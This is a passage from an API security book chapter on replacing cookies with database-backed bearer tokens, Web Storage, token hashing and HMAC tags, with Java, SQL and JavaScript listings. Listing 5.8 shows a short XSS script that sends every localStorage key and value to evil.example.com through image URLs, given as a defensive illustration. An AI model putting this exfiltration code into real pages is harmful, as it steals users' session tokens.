ciated with it, including the username of the authenticated user and the expiry time
of the token. A single table is enough to store this structure, as shown in listing 5.2.
The token ID, username, and expiry are represented as individual columns so that
they can be indexed and searched, but any remaining attributes are stored as a JSON
object serialized into a string (varchar) column. If you needed to lookup tokens
based on other attributes, you could extract the attributes into a separate table, but in
most cases this extra complexity is not justified. Open the schema.sql file in your edi-
tor and add the table definition to the bottom. Be sure to also grant appropriate per-
missions to the Natter database user.
CREATE TABLE tokens(
token_id VARCHAR(100) PRIMARY KEY,
user_id VARCHAR(30) NOT NULL,
expiry TIMESTAMP NOT NULL,
attributes VARCHAR(4096) NOT NULL
);
GRANT SELECT, INSERT, DELETE ON tokens TO natter_api_user;
With the database schema created, you can now implement the DatabaseTokenStore
to use it. The first thing you need to do when issuing a new token is to generate a fresh
token ID. You shouldn’t use a normal database sequence for this, because token IDs
Alternative token storage databases
Although the SQL database storage used in this chapter is adequate for demonstration
purposes and low-traffic APIs, a relational database may not be a perfect choice for all
deployments. Authentication tokens are validated on every request, so the cost of a
database transaction for every lookup can soon add up. On the other hand, tokens are
usually extremely simple in structure, so they don’t need a complicated database
schema or sophisticated integrity constraints. At the same time, token state rarely
changes after a token has been issued, and a fresh token should be generated when-
ever any security-sensitive attributes change to avoid session fixation attacks. This
means that many uses of tokens are also largely unaffected by consistency worries.
For these reasons, many production implementations of token storage opt for non-
relational database backends, such as the Redis in-memory key-value store (https://
redis.io), or a NoSQL JSON store that emphasizes speed and availability.
Whichever database backend you choose, you should ensure that it respects consis-
tency in one crucial aspect: token deletion. If a token is deleted due to a suspected
security breach, it should not come back to life later due to a glitch in the database.
The Jepsen project (https://jepsen.io/analyses) provides detailed analysis and test-
ing of the consistency properties of many databases.
Listing 5.2
The token database schema
Link the token to
the ID of the user.
Store the attributes
as a JSON string.
Grant permissions to the Natter database user.
157
Tokens without cookies
must be unguessable for an attacker. Otherwise an attacker can simply wait for
another user to login and then guess the ID of their token to hijack their session. IDs
generated by database sequences tend to be extremely predictable, often just a simple
incrementing integer value. To be secure, a token ID should be generated with a high
degree of entropy from a cryptographically-secure random number generator (RNG). In
Java, this means the random data should come from a SecureRandom object. In other
languages you should read the data from /dev/urandom (on Linux) or from an
appropriate operating system call such as getrandom(2) on Linux or RtlGenRandom()
on Windows.
DEFINITION
In information security, entropy is a measure of how likely it is that
a random variable has a given value. When a variable is said to have 128 bits of
entropy, that means that there is a 1 in 2128 chance of it having one specific
value rather than any other value. The more entropy a variable has, the more
difficult it is to guess what value it has. For long-lived values that should be un-
guessable by an adversary with access to large amounts of computing power,
an entropy of 128 bits is a secure minimum. If your API issues a very large
number of tokens with long expiry times, then you should consider a higher
entropy of 160 bits or more. For short-lived tokens and an API with rate-limiting
on token validation requests, you could reduce the entropy to reduce the token
size, but this is rarely worth it.
What if I run out of entropy?
It is a persistent myth that operating systems can somehow run out of entropy if you
read too much from the random device. This often leads developers to come up with
elaborate and unnecessary workarounds. In the worst cases, these workarounds
dramatically reduce the entropy, making token IDs predictable. Generating cryp-
tographically-secure random data is a complex topic and not something you should
attempt to do yourself. Once the operating system has gathered around 256 bits of
random data, from interrupt timings and other low-level observations of the system,
it can happily generate strongly unpredictable data until the heat death of the uni-
verse. There are two general exceptions to this rule:
When the operating system first starts, it may not have gathered enough
entropy and so values may be temporarily predictable. This is generally only a
concern to kernel-level services that run very early in the boot sequence. The
Linux getrandom() system call will block in this case until the OS has gath-
ered enough entropy.
When a virtual machine is repeatedly resumed from a snapshot it will have
identical internal state until the OS re-seeds the random data generator. In
some cases, this may result in identical or very similar output from the ran-
dom device for a short time. While a genuine problem, you are unlikely to do
a better job than the OS at detecting or handling this situation.
In short, trust the OS because most OS random data generators are well-designed
and do a good job of generating unpredictable output. You should avoid the /dev/
158
CHAPTER 5
Modern token-based authentication
For Natter, you’ll use 160-bit token IDs generated with a SecureRandom object. First,
generate 20 bytes of random data using the nextBytes() method. Then you can
base64url-encode that to produce an URL-safe random string:
private String randomId() {
var bytes = new byte[20];
new SecureRandom().nextBytes(bytes);
return Base64url.encode(bytes);
}
Listing 5.3 shows the complete DatabaseTokenStore implementation. After creating a
random ID, you can serialize the token attributes into JSON and then insert the data
into the tokens table using the Dalesbred library introduced in chapter 2. Reading
the token is also simple using a Dalesbred query. A helper method can be used to con-
vert the JSON attributes back into a map to create the Token object. Dalesbred will
call the method for the matching row (if one exists), which can then perform the
JSON conversion to construct the real token. To revoke a token on logout, you can
simply delete it from the database. Navigate to src/main/java/com/manning/api-
securityinaction/token and create a new file named DatabaseTokenStore.java. Type in
the contents of listing 5.3 and save the new file.
package com.manning.apisecurityinaction.token;
import org.dalesbred.Database;
import org.json.JSONObject;
import spark.Request;
import java.security.SecureRandom;
import java.sql.*;
import java.util.*;
public class DatabaseTokenStore implements TokenStore {
private final Database database;
private final SecureRandom secureRandom;
public DatabaseTokenStore(Database database) {
this.database = database;
this.secureRandom = new SecureRandom();
}
(continued)
random device on Linux because it doesn’t generate better quality output than /dev/
urandom and may block your process for long periods of time. If you want to learn
more about how operating systems generate random data securely, see chapter 9 of
Cryptography Engineering by Niels Ferguson, Bruce Schneier, and Tadayoshi Kohno
(Wiley, 2010).
Listing 5.3
The DatabaseTokenStore
Generate 20 bytes of random
data from SecureRandom.
Encode the result with URL-safe
Base64 encoding to create a string.
Use a SecureRandom to
generate unguessable
token IDs.
159
Tokens without cookies
private String randomId() {
var bytes = new byte[20];
secureRandom.nextBytes(bytes);
return Base64url.encode(bytes);
}
@Override
public String create(Request request, Token token) {
var tokenId = randomId();
var attrs = new JSONObject(token.attributes).toString();
database.updateUnique("INSERT INTO " +
"tokens(token_id, user_id, expiry, attributes) " +
"VALUES(?, ?, ?, ?)", tokenId, token.username,
token.expiry, attrs);
return tokenId;
}
@Override
public Optional<Token> read(Request request, String tokenId) {
return database.findOptional(this::readToken,
"SELECT user_id, expiry, attributes " +
"FROM tokens WHERE token_id = ?", tokenId);
}
private Token readToken(ResultSet resultSet)
throws SQLException {
var username = resultSet.getString(1);
var expiry = resultSet.getTimestamp(2).toInstant();
var json = new JSONObject(resultSet.getString(3));
var token = new Token(expiry, username);
for (var key : json.keySet()) {
token.attributes.put(key, json.getString(key));
}
return token;
}
@Override
public void revoke(Request request, String tokenId) {
database.update("DELETE FROM tokens WHERE token_id = ?",
tokenId);
}
}
All that remains is to plug in the DatabaseTokenStore in place of the CookieToken-
Store. Open Main.java in your editor and locate the lines that create the Cookie-
TokenStore. Replace them with code to create the DatabaseTokenStore, passing in
the Dalesbred Database object:
var databaseTokenStore = new DatabaseTokenStore(database);
TokenStore tokenStore = databaseTokenStore;
var tokenController = new TokenController(tokenStore);
Use a SecureRandom to
generate unguessable
token IDs.
Serialize the
token attributes
as JSON.
Use a helper
method to
reconstruct
the token
from the
JSON.
Revoke a token on logout by
deleting it from the database.
160
CHAPTER 5
Modern token-based authentication
Save the file and restart the API to see the new token storage format at work.
TIP
To ensure that Java uses the non-blocking /dev/urandom device for
seeding the SecureRandom class, pass the option -Djava.security.egd=file:
/dev/urandom to the JVM. This can also be configured in the java.security
properties file in your Java installation.
First create a test user, as always:
curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
Then call the login endpoint to obtain a session token:
$ curl -i -H 'Content-Type: application/json' -u test:password \
-X POST https://localhost:4567/sessions
HTTP/1.1 201 Created
Date: Wed, 22 May 2019 15:35:50 GMT
Content-Type: application/json
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: private, max-age=0
Server:
Transfer-Encoding: chunked
{"token":"QDAmQ9TStkDCpVK5A9kFowtYn2k"}
Note the lack of a Set-Cookie header in the response. There is just the new token in
the JSON body. One quirk is that the only way to pass the token back to the API is via
the old X-CSRF-Token header you added for cookies:
$ curl -i -H 'Content-Type: application/json' \
-H 'X-CSRF-Token: QDAmQ9TStkDCpVK5A9kFowtYn2k' \
-d '{"name":"test","owner":"test"}' \
https://localhost:4567/spaces
HTTP/1.1 201 Created
We’ll fix that in the next section so that the token is passed in a more appropriate header.
5.2.2
The Bearer authentication scheme
Passing the token in a X-CSRF-Token header is less than ideal for tokens that have
nothing to do with CSRF. You could just rename the header, and that would be per-
fectly acceptable. However, a standard way to pass non-cookie-based tokens to an API
exists in the form of the Bearer token scheme for HTTP authentication defined by RFC
6750 (https://tools.ietf.org/html/rfc6750). While originally designed for OAuth2
usage (chapter 7), the scheme has been widely adopted as a general mechanism for
API token-based authentication.
DEFINITION
A bearer token is a token that can be used at an API simply by
including it in the request. Any client that has a valid token is authorized to
Pass the token in the
X-CSRF-Token header to
check that it is working.
161
Tokens without cookies
use that token and does not need to supply any further proof of authentication.
A bearer token can be given to a third party to grant them access without
revealing user credentials but can also be used easily by attackers if stolen.
To send a token to an API using the Bearer scheme, you simply include it in an Autho-
rization header, much like you did with the encoded username and password for
HTTP Basic authentication. The token is included without additional encoding:2
Authorization: Bearer QDAmQ9TStkDCpVK5A9kFowtYn2k
The standard also describes how to issue a WWW-Authenticate challenge header for
bearer tokens, which allows our API to become compliant with the HTTP specifica-
tions once again, because you removed that header in chapter 4. The challenge can
include a realm parameter, just like any other HTTP authentication scheme, if the
API requires different tokens for different endpoints. For example, you might return
realm="users" from one endpoint and realm="admins" from another, to indicate to
the client that they should obtain a token from a different login endpoint for adminis-
trators compared to regular users. Finally, you can also return a standard error code and
description to tell the client why the request was rejected. Of the three error codes
defined in the specification, the only one you need to worry about now is invalid_
token, which indicates that the token passed in the request was expired or otherwise
invalid. For example, if a client passed a token that has expired you could return:
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer realm="users", error="invalid_token",
error_description="Token has expired"
This lets the client know to reauthenticate to get a new token and then try its request
again. Open the TokenController.java file in your editor and update the validate-
Token and logout methods to extract the token from the Authorization header. If the
value starts with the string "Bearer" followed by a single space, then you can extract
the token ID from the rest of the value. Otherwise you should ignore it, to allow
HTTP Basic authentication to still work at the login endpoint. You can also return a
useful WWW-Authenticate header if the token has expired. Listing 5.4 shows the
updated methods. Update the implementation and save the file.
public void validateToken(Request request, Response response) {
var tokenId = request.headers("Authorization");
if (tokenId == null || !tokenId.startsWith("Bearer ")) {
return;
}
tokenId = tokenId.substring(7);
2 The syntax of the Bearer scheme allows tokens that are Base64-encoded, which is sufficient for most token
formats in common use. It doesn’t say how to encode tokens that do not conform to this syntax.
Listing 5.4
Parsing Bearer Authorization headers
Check that the
Authorization
header is present
and uses the
Bearer scheme.
The token ID is the rest
of the header value.
162
CHAPTER 5
Modern token-based authentication
tokenStore.read(request, tokenId).ifPresent(token -> {
if (Instant.now().isBefore(token.expiry)) {
request.attribute("subject", token.username);
token.attributes.forEach(request::attribute);
} else {
response.header("WWW-Authenticate",
"Bearer error=\"invalid_token\"," +
"error_description=\"Expired\"");
halt(401);
}
});
}
public JSONObject logout(Request request, Response response) {
var tokenId = request.headers("Authorization");
if (tokenId == null || !tokenId.startsWith("Bearer ")) {
throw new IllegalArgumentException("missing token header");
}
tokenId = tokenId.substring(7);
tokenStore.revoke(request, tokenId);
response.status(200);
return new JSONObject();
}
You can also add the WWW-Authenticate header challenge when no valid credentials
are present on a request at all. Open the UserController.java file and update the
requireAuthentication filter to match listing 5.5.
public void requireAuthentication(Request request, Response response) {
if (request.attribute("subject") == null) {
response.header("WWW-Authenticate", "Bearer");
halt(401);
}
}
5.2.3
Deleting expired tokens
The new token-based authentication method is working well for your mobile and
desktop apps, but your database administrators are worried that the tokens table
keeps growing larger without any tokens ever being removed. This also creates a
potential DoS attack vector, because an attacker could keep logging in to generate
enough tokens to fill the database storage. You should implement a periodic task to
delete expired tokens to prevent the database growing too large. This is a one-line task
in SQL, as shown in listing 5.6. Open DatabaseTokenStore.java and add the method in
the listing to implement expired token deletion.
Listing 5.5
Prompting for Bearer authentication
If the token is expired,
then tell the client using
a standard response.
Check that the
Authorization
header is present
and uses the
Bearer scheme.
The token ID is the rest
of the header value.
Prompt for Bearer authentication
if no credentials are present.
163
Tokens without cookies
public void deleteExpiredTokens() {
database.update(
"DELETE FROM tokens WHERE expiry < current_timestamp");
}
To make this efficient, you should index the expiry column on the database, so that it
does not need to loop through every single token to find the ones that have expired.
Open schema.sql and add the following line to the bottom to create the index:
CREATE INDEX expired_token_idx ON tokens(expiry);
Finally, you need to schedule a periodic task to call the method to delete the expired
tokens. There are many ways you could do this in production. Some frameworks
include a scheduler for these kinds of tasks, or you could expose the method as a
REST endpoint and call it periodically from an external job. If you do this, remember
to apply rate-limiting to that endpoint or require authentication (or a special permis-
sion) before it can be called, as in the following example:
before("/expired_tokens", userController::requireAuthentication);
delete("/expired_tokens", (request, response) -> {
databaseTokenStore.deleteExpiredTokens();
return new JSONObject();
});
For now, you can use a simple Java scheduled executor service to periodically call
the method. Open DatabaseTokenStore.java again, and add the following lines to the
constructor:
Executors.newSingleThreadScheduledExecutor()
.scheduleAtFixedRate(this::deleteExpiredTokens,
10, 10, TimeUnit.MINUTES);
This will cause the method to be executed every 10 minutes, after an initial 10-minute
delay. If a cleanup job takes more than 10 minutes to run, then the next run will be
scheduled immediately after it completes.
5.2.4
Storing tokens in Web Storage
Now that you’ve got tokens working without cookies, you can update the Natter UI to
send the token in the Authorization header instead of in the X-CSRF-Token header.
Open natter.js in your editor and update the createSpace function to pass the token
in the correct header. You can also remove the credentials field, because you no lon-
ger need the browser to send cookies in the request:
fetch(apiUrl + '/spaces', {
method: 'POST',
body: JSON.stringify(data),
Listing 5.6
Deleting expired tokens
Delete all tokens with an
expiry time in the past.
Remove the credentials
field to stop the browser
sending cookies.
164
CHAPTER 5
Modern token-based authentication
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + csrfToken
}
})
Of course, you can also rename the csrfToken variable to just token now if you like.
Save the file and restart the API and the duplicate UI on port 9999. Both copies of the
UI will now work fine with no session cookie. Of course, there is still one cookie left to
hold the token between the login page and the natter page, but you can get rid of that
now too.
Until the release of HTML 5, there were very few alternatives to cookies for storing
tokens in a web browser client. Now there are two widely-supported alternatives:
The Web Storage API that includes the localStorage and sessionStorage
objects for storing simple key-value pairs.
The IndexedDB API that allows storing larger amounts of data in a more sophisti-
cated JSON NoSQL database.
Both APIs provide significantly greater storage capacity than cookies, which are typi-
cally limited to just 4KB of storage for all cookies for a single domain. However,
because session tokens are relatively small, you can stick to the simpler Web Storage
API in this chapter. While IndexedDB has even larger storage limits than Web Storage,
it typically requires explicit user consent before it can be used. By replacing cookies
for storage on the client, you will now have a replacement for all three aspects of
token-based authentication provided by cookies, as shown in figure 5.4:
On the backend, you can manually store cookie state in a database to replace
the cookie storage provided by most web frameworks.
You can use the Bearer authentication scheme as a standard way to communi-
cate tokens from the client to the API, and to prompt for tokens when not
supplied.
Cookies can be replaced on the client by the Web Storage API.
Web Storage is simple to use, especially when compared with how hard it was to
extract a cookie in JavaScript. Browsers that support the Web Storage API, which
includes most browsers in current use, add two new fields to the standard JavaScript
window object:
The sessionStorage object can be used to store data until the browser window
or tab is closed.
The localStorage object stores data until it is explicitly deleted, saving the data
even over browser restarts.
Although similar to session cookies, sessionStorage is not shared between browser
tabs or windows; each tab gets its own storage. Although this can be useful, if you use
Pass the token in the
Authorization field using
the Bearer scheme.
165
Tokens without cookies
sessionStorage to store authentication tokens then the user will be forced to login
again every time they open a new tab and logging out of one tab will not log them out
of the others. For this reason, it is more convenient to store tokens in localStorage
instead.
Each object implements the same Storage interface that defines setItem(key,
value), getItem(key), and removeItem(key) methods to manipulate key-value pairs
in that storage. Each storage object is implicitly scoped to the origin of the script that
calls the API, so a script from example.com will see a completely different copy of the
storage to a script from example.org.
TIP
If you want scripts from two sibling sub-domains to share storage, you
can set the document.domain field to a common parent domain in both
scripts. Both scripts must explicitly set the document.domain, otherwise it will
be ignored. For example, if a script from a.example.com and a script from
b.example.com both set document.domain to example.com, then they will
share Web Storage. This is allowed only for a valid parent domain of the script
origin, and you cannot set it to a top-level domain like .com or .org. Setting
the document.domain field also instructs the browser to ignore the port when
comparing origins.
To update the login UI to set the token in local storage rather than a cookie, open
login.js in your editor and locate the line that currently sets the cookie:
document.cookie = 'token=' + json.token +
';Secure;SameSite=strict';
Web browser client
API server
Request
Token store
Authorization: Bearer
JSON/
WWW-Authenticate
Web
storage
Tokens can be stored
in Web Storage instead
of cookies.
The Bearer authentication
scheme can be used to send
tokens and prompt for a token.
Token state can be
manually stored in a
backend database or cache.
Response
Figure 5.4
Cookies can be replaced by Web Storage for storing tokens on the client. The
Bearer authentication scheme provides a standard way to communicate tokens from the
client to the API, and a token store can be manually implemented on the backend.
166
CHAPTER 5
Modern token-based authentication
Remove that line and replace it with the following line to set the token in local storage
instead:
localStorage.setItem('token', json.token);
Now open natter.js and find the line that reads the token from a cookie. Delete that
line and the getCookie function, and replace it with the following:
let token = localStorage.getItem('token');
That is all it takes to use the Web Storage API. If the token expires, then the API will
return a 401 response, which will cause the UI to redirect to the login page. Once the
user has logged in again, the token in local storage will be overwritten with the new
version, so you do not need to do anything else. Restart the UI and check that every-
thing is working as expected.
5.2.5
Updating the CORS filter
Now that your API no longer needs cookies to function, you can tighten up the CORS
settings. Though you are explicitly sending credentials on each request, the browser is
not having to add any of its own credentials (cookies), so you can remove the Access-
Control-Allow-Credentials headers to stop the browser sending any. If you wanted,
you could now also set the allowed origins header to * to allow requests from any ori-
gin, but it is best to keep it locked down unless you really want the API to be open to
all comers. You can also remove X-CSRF-Token from the allowed headers list. Open
CorsFilter.java in your editor and update the handle method to remove these extra
headers, as shown in listing 5.7.
@Override
public void handle(Request request, Response response) {
var origin = request.headers("Origin");
if (origin != null && allowedOrigins.contains(origin)) {
response.header("Access-Control-Allow-Origin", origin);
response.header("Vary", "Origin");
}
if (isPreflightRequest(request)) {
if (origin == null || !allowedOrigins.contains(origin)) {
halt(403);
}
response.header("Access-Control-Allow-Headers",
"Content-Type, Authorization");
response.header("Access-Control-Allow-Methods",
"GET, POST, DELETE");
halt(204);
}
}
Listing 5.7
Updated CORS filter
Remove the
Access-Control-
Allow-Credentials
header.
Remove X-CSRF-Token
from the allowed
headers.
167
Tokens without cookies
Because the API is no longer allowing clients to send cookies on requests, you must
also update the login UI to not enable credentials mode on its fetch request. If you
remember from earlier, you had to enable this so that the browser respected the Set-
Cookie header on the response. If you leave this mode enabled but with credentials
mode rejected by CORS, then the browser will completely block the request and you
will no longer be able to login. Open login.js in your editor and remove the line that
requests credentials mode for the request:
credentials: 'include',
Restart the API and UI again and check that everything is still working. If it does not
work, you may need to clear your browser cache to pick up the latest version of the
login.js script. Starting a fresh Incognito/Private Browsing page is the simplest way to
do this.3
5.2.6
XSS attacks on Web Storage
Storing tokens in Web Storage is much easier to manage from JavaScript, and it elimi-
nates the CSRF attacks that impact session cookies, because the browser is no longer
automatically adding tokens to requests for us. But while the session cookie could be
marked as HttpOnly to prevent it being accessible from JavaScript, Web Storage
objects are only accessible from JavaScript and so the same protection is not available.
This can make Web Storage more susceptible to XSS exfiltration attacks, although Web
Storage is only accessible to scripts running from the same origin while cookies are
available to scripts from the same domain or any sub-domain by default.
DEFINITION
Exfiltration is the act of stealing tokens and sensitive data from a
page and sending them to the attacker without the victim being aware. The
attacker can then use the stolen tokens to log in as the user from the attacker’s
own device.
If an attacker can exploit an XSS attack (chapter 2) against a browser-based client of
your API, then they can easily loop through the contents of Web Storage and create
an img tag for each item with the src attribute, pointing to an attacker-controlled web-
site to extract the contents, as illustrated in figure 5.5.
Most browsers will eagerly load an image source URL, without the img even being
added to the page,4 allowing the attacker to steal tokens covertly with no visible indica-
tion to the user. Listing 5.8 shows an example of this kind of attack, and how little
code is required to carry it out.
3 Some older versions of Safari would disable local storage in private browsing mode, but this has been fixed
since version 12.
4 I first learned about this technique from Jim Manico, founder of Manicode Security (https://manicode.com).
168
CHAPTER 5
Modern token-based authentication
for (var i = 0; i < localStorage.length; ++i) {
var key = localStorage.key(i);
var img = document.createElement('img');
img.setAttribute('src',
'https://evil.example.com/exfil?key=' +
encodeURIComponent(key) + '&value=' +
encodeURIComponent(localStorage.getItem(key)));
}
Although using HttpOnly cookies can protect against this attack, XSS attacks under-
mine the security of all forms of web browser authentication technologies. If the
attacker cannot extract the token and exfiltrate it to their own device, they will instead
use the XSS exploit to execute the requests they want to perform directly from within
the victim’s browser as shown in figure 5.6. Such requests will appear to the API to
come from the legitimate UI, and so would also defeat any CSRF defenses. While
more complex, these kinds of attacks are now commonplace using frameworks such as
the Browser Exploitation Framework (https://beefproject.com), which allow sophisti-
cated remote control of a victim’s browser through an XSS attack.
NOTE
There is no reasonable defense if an attacker can exploit XSS, so elim-
inating XSS vulnerabilities from your UI must always be your priority. See
chapter 2 for advice on preventing XSS attacks.
Listing 5.8
Covert exfiltration of Web Storage
Web browser
Web storage
Attacker script
Attacker website
<img src=...>
https://attacker.x?token=xyz . . .
xyz...
The attacker XSS script
queries Web storage
for all tokens.
It creates image tags for
each token, pointing at an
attacker-controlled website.
The img URL includes the
token allowing the attacker
to store it on the website.
Figure 5.5
An attacker can exploit an XSS vulnerability to steal tokens from
Web Storage. By creating image elements, the attacker can exfiltrate the
tokens without any visible indication to the user.
Loop through every
element in localStorage.
Construct an
img element with
the src element
pointing to an
attacker-
controlled site.
Encode the key and value into the src
URL to send them to the attacker.
169
Tokens without cookies
Chapter 2 covered general defenses against XSS attacks in a REST API. Although a
more detailed discussion of XSS is out of scope for this book (because it is primarily
an attack against a web UI rather than an API), two technologies are worth mention-
ing because they provide significant hardening against XSS:
The Content-Security-Policy header (CSP), mentioned briefly in chapter 2, pro-
vides fine-grained control over which scripts and other resources can be loaded
by a page and what they are allowed to do. Mozilla Developer Network has a
good introduction to CSP at https://developer.mozilla.org/en-US/docs/Web/
HTTP/CSP.
An experimental proposal from Google called Trusted Types aims to completely
eliminate DOM-based XSS attacks. DOM-based XSS occurs when trusted Java-
Script code accidentally allows user-supplied HTML to be injected into the DOM,
such as when assigning user input to the .innerHTML attribute of an existing
element. DOM-based XSS is notoriously difficult to prevent as there are many
ways that this can occur, not all of which are obvious from inspection. The
Trusted Types proposal allows policies to be installed that prevent arbitrary
strings from being assigned to these vulnerable attributes. See https://developers
.google.com/web/updates/2019/02/trusted-types for more information.
Pop quiz
2
Which one of the following is a secure way to generate a random token ID?
a
Base64-encoding the user’s name plus a counter.
b
Hex-encoding the output of new Random().nextLong().
Web browser
Cookies
Attacker script
Attacker API
xyz...
Victim API
Cookie: xyz . . .
The attacker script receives
requests from the attacker
over a CORS connection to
the attacker’s server.
The script then makes
requests to the victim API.
The browser will include
cookies as they appear to
come from the same origin.
Figure 5.6
An XSS exploit can be used to proxy requests from the attacker through the
user’s browser to the API of the victim. Because the XSS script appears to be from the
same origin as the API, the browser will include all cookies and the script can do anything.
170
CHAPTER 5
Modern token-based authentication
5.3
Hardening database token storage
Suppose that an attacker gains access to your token database, either through direct
access to the server or by exploiting a SQL injection attack as described in chapter 2.
They can not only view any sensitive data stored with the tokens, but also use those
tokens to access your API. Because the database contains tokens for every authenti-
cated user, the impact of such a compromise is much more severe than compromising
a single user’s token. As a first step, you should separate the database server from the
API and ensure that the database is not directly accessible by external clients. Commu-
nication between the database and the API should be secured with TLS. Even if you
do this, there are still many potential threats against the database, as shown in figure 5.7.
If an attacker gains read access to the database, such as through a SQL injection
attack, they can steal tokens and use them to access the API. If they gain write access,
then they can insert new tokens granting themselves access or alter existing tokens to
increase their access. Finally, if they gain delete access then they can revoke other
users’ tokens, denying them access to the API.
5.3.1
Hashing database tokens
Authentication tokens are credentials that allow access to a user’s account, just like a
password. In chapter 3, you learned to hash passwords to protect them in case the
user database is ever compromised. You should do the same for authentication
tokens, for the same reason. If an attacker ever compromises the token database,
they can immediately use all the login tokens for any user that is currently logged in.
Unlike user passwords, authentication tokens have high entropy, so you don’t need to
use an expensive password hashing algorithm like Scrypt. Instead you can use a fast,
cryptographic hash function such as SHA-256 that you used for generating anti-CSRF
tokens in chapter 4.
(continued)
c
Base64-encoding 20 bytes of output from a SecureRandom.
d
Hashing the current time in microseconds with a secure hash function.
e
Hashing the current time together with the user’s password with SHA-256.
3
Which standard HTTP authentication scheme is designed for token-based
authentication?
a
NTLM
b
HOBA
c
Basic
d
Bearer
e
Digest
The answers are at the end of the chapter.
171
Hardening database token storage
Listing 5.9 shows how to add token hashing to the DatabaseTokenStore by reusing
the sha256() method you added to the CookieTokenStore in chapter 4. The token
ID given to the client is the original, un-hashed random string, but the value stored
in the database is the SHA-256 hash of that string. Because SHA-256 is a one-way
hash function, an attacker that gains access to the database won’t be able to reverse
the hash function to determine the real token IDs. To read or revoke the token, you
simply hash the value provided by the user and use that to look up the record in the
database.
@Override
public String create(Request request, Token token) {
var tokenId = randomId();
var attrs = new JSONObject(token.attributes).toString();
database.updateUnique("INSERT INTO " +
"tokens(token_id, user_id, expiry, attributes) " +
"VALUES(?, ?, ?, ?)", hash(tokenId), token.username,
token.expiry, attrs);
Listing 5.9
Hashing database tokens
Datacenter
API account
DBMS account
API server
Token store
Trust boundaries
TLS
API
clients
Possible SQL
injection attacks
Write access allows new
tokens to be injected or
existing tokens to be modified.
Read access allows
tokens to be stolen
and then replayed
to the API.
Delete rights would
allow other users’ tokens
to be destroyed.
Figure 5.7
A database token store is subject to several threats, even if you secure the communi-
cations between the API and the database using TLS. An attacker may gain direct access to the
database or via an injection attack. Read access allows the attacker to steal tokens and gain access
to the API as any user. Write access allows them to create fake tokens or alter their own token. If
they gain delete access, then they can delete other users’ tokens, denying them access.
Hash the
provided token
when storing
or looking up in
the database.
172
CHAPTER 5
Modern token-based authentication
return tokenId;
}
@Override
public Optional<Token> read(Request request, String tokenId) {
return database.findOptional(this::readToken,
"SELECT user_id, expiry, attributes " +
"FROM tokens WHERE token_id = ?", hash(tokenId));
}
@Override
public void revoke(Request request, String tokenId) {
database.update("DELETE FROM tokens WHERE token_id = ?",
hash(tokenId));
}
private String hash(String tokenId) {
var hash = CookieTokenStore.sha256(tokenId);
return Base64url.encode(hash);
}
5.3.2
Authenticating tokens with HMAC
Although effective against token theft, simple hashing does not prevent an attacker
with write access from inserting a fake token that gives them access to another user’s
account. Most databases are also not designed to provide constant-time equality
comparisons, so database lookups can be vulnerable to timing attacks like those dis-
cussed in chapter 4. You can eliminate both issues by calculating a message authentica-
tion code (MAC), such as the standard hash-based MAC (HMAC). HMAC works like a
normal cryptographic hash function, but incorporates a secret key known only to
the API server.
DEFINITION
A message authentication code (MAC) is an algorithm for comput-
ing a short fixed-length authentication tag from a message and a secret key. A
user with the same secret key will be able to compute the same tag from the
same message, but any change in the message will result in a completely dif-
ferent tag. An attacker without access to the secret cannot compute a correct
tag for any message. HMAC (hash-based MAC) is a widely used secure MAC
based on a cryptographic hash function. For example, HMAC-SHA-256 is
HMAC using the SHA-256 hash function.
The output of the HMAC function is a short authentication tag that can be appended
to the token as shown in figure 5.8. An attacker without access to the secret key can’t
calculate the correct tag for a token, and the tag will change if even a single bit of the
token ID is altered, preventing them from tampering with a token or faking new ones.
In this section, you’ll authenticate the database tokens with the widely used HMAC-
SHA256 algorithm. HMAC-SHA256 takes a 256-bit secret key and an input message
and produces a 256-bit authentication tag. There are many wrong ways to construct a
secure MAC from a hash function, so rather than trying to build your own solution
Hash the
provided token
when storing
or looking up in
the database.
Reuse the SHA-256
method from the
CookieTokenStore
for the hash.
173
Hardening database token storage
you should always use HMAC, which has been extensively studied by experts. For
more information about secure MAC algorithms, I recommend Serious Cryptography by
Jean-Philippe Aumasson (No Starch Press, 2017).
Rather than storing the authentication tag in the database alongside the token ID,
you’ll instead leave that as-is. Before you return the token ID to the client, you’ll com-
pute the HMAC tag and append it to the encoded token, as shown in figure 5.9. When
the client sends a request back to the API including the token, you can validate the
authentication tag. If it is valid, then the tag is stripped off and the original token ID
passed to the database token store. If the tag is invalid or missing, then the request
can be immediately rejected without any database lookups, preventing any timing
attacks. Because an attacker with access to the database cannot create a valid authenti-
cation tag, they can’t use any stolen tokens to access the API and they can’t create
their own tokens by inserting records into the database.
Listing 5.10 shows the code for computing the HMAC tag and appending it to the
token. You can implement this as a new HmacTokenStore implementation that can be
L2xuanMgu3ejXRjw1GmBOdLLbxI
HMAC-SHA256
URL-safe Base64
L2xuanMgu3ejXRjw1GmBOdLLbxI.dnYUdylHgTGpNcv39ol...
f9d9d851dca5...
The encoded token
is authenticated with
HMAC using a secret key.
The HMAC tag is encoded
and appended to the token.
Key
The random database token
ID is encoded with Base64.
Figure 5.8
A token can be protected against theft and forgery by computing
a HMAC authentication tag using a secret key. The token returned from the
database is passed to the HMAC-SHA256 function along with the secret key.
The output authentication tag is encoded and appended to the database ID to
return to the client. Only the original token ID is stored in the database, and
an attacker without access to the secret key cannot calculate a valid
authentication tag.
174
CHAPTER 5
Modern token-based authentication
wrapped around the DatabaseTokenStore to add the protections, as HMAC turns out
to be useful for other token stores as you will see in the next chapter. The HMAC tag
can be implement using the javax.crypto.Mac class in Java, using a Key object passed
to your constructor. You’ll see soon how to generate the key. Create a new file Hmac-
TokenStore.java alongside the existing JsonTokenStore.java and type in the contents
of listing 5.10.
package com.manning.apisecurityinaction.token;
import spark.Request;
import javax.crypto.Mac;
import java.nio.charset.StandardCharsets;
import java.security.*;
import java.util.*;
public class HmacTokenStore implements TokenStore {
private final TokenStore delegate;
private final Key macKey;
public HmacTokenStore(TokenStore delegate, Key macKey) {
this.delegate = delegate;
this.macKey = macKey;
}
Listing 5.10
Computing a HMAC tag for a new token
Token
database
Database token
store
HMAC token
store
tokenId
tokenId.tag
Secret key
API server boundary
The token given to the client
has an authentication tag.
The token in the database
is missing the tag.
tokenId: data
Figure 5.9
The database token ID is left untouched, but an HMAC authentication tag is
computed and attached to the token ID returned to API clients. When a token is presented to
